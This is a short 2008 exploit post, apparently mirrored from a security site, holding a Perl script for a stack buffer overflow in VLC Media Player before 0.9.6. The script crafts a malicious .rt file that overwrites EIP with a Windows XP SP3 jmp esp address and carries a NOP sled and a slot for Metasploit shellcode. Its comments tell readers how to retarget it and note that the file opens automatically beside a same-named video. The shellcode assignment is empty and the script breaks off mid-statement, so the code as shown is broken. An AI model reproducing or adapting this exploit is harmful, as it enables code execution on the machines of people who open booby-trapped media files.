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VLC Media Player < 0.9.6 .RT Stack Buffer Overflow Exploit
来源:skdrat@hotmail.com 作者:SkD 发布时间:2008-11-10  
# VLC Media Player < 0.9.6 .RT File Buffer Overflow (Stack Based)
# ---------------------------------------------------------------
# Exploit by SkD <skdrat@hotmail.com>
# This should work on a fully up-to-date Windows XP SP3. If you want it to work
# on your OS version, just find a "jmp esp" address in one of the dlls loaded
# with VLC :).
# Have fun.  Remember that VLC will open the file .rt automatically with a video
# of the same name (example: s.mov with s.rt in the same folder).
# Credits to Tobias Klein.
# Author has no responsibility over the damage you do with this!

use strict; use warnings;
# win32_exec -  EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $shellcode =
my $char = "\x41";
my $nop = "\x90";
my $eip = "\xd7\x30\x9d\x7c"; #   FOR WINDOWS XP SP3:  0x7c9d30d7       jmp esp (shell32.dll)
my $jmp = "\xeb\x06\xFF\xFF";
my $addr =  "\xb5\xb5\xfd\x7f";
open(my $rt, "> s.rt");
print $rt  "\x3C\x77\x69\x6E\x64\x6F\x77\x20\x68\x65".
             $char x 72 . $eip . $jmp . $addr .  $nop x 12 .
             $shellcode . $char x 1024 .

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